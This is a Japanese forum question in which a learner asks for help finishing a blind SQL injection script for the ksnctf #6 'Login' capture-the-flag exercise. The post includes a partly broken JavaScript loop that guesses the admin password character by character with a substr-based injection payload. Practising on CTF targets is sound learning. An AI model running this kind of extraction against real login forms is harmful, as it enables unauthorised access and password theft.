ksnctf #6 Loginを解こうとしています。
ブラインドSQLインジェクションを使い文字数の特定まではできたのですが、そこから先に進めません。
以下のようなプログラムを組んでみたのですがここからどう書いていけばいいのかわかりません。
アドバイスがありましたらお願いいたします。
おそらく送信はできているので文字があっていたら何か通知するようにすればいいのでしょうが、レスポンスの受信方法がわかりません・・・。
他にも「コードのこの部分はこうしたほうがいい」みたいなのがありましたらお願いします。
javascript
1var char=[]; 2var pass=""; 3var string=""; 4 5for(i=65;i<=90;i++) char.push(String.fromCharCode(i)); 6for(i=97;i<=122;i++) char.push(String.fromCharCode(i)); 7 8var xht=new XMLHttpRequest(); 9 10for(i=1;i<=21;i++){ 11 for(j=0;j<char.length;j++){ 12 13 string="admin' and substr((select pass from user where id='admin'),"+i+",1) = '"+char[j]+"'; --"; 14 xht.open("POST","http://http://ctfq.sweetduet.info:10080/~q6/"); 15 xht.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); 16 xht.send(string); 17 18 } 19} 20
回答1件
あなたの回答
tips
プレビュー
バッドをするには、ログインかつ
こちらの条件を満たす必要があります。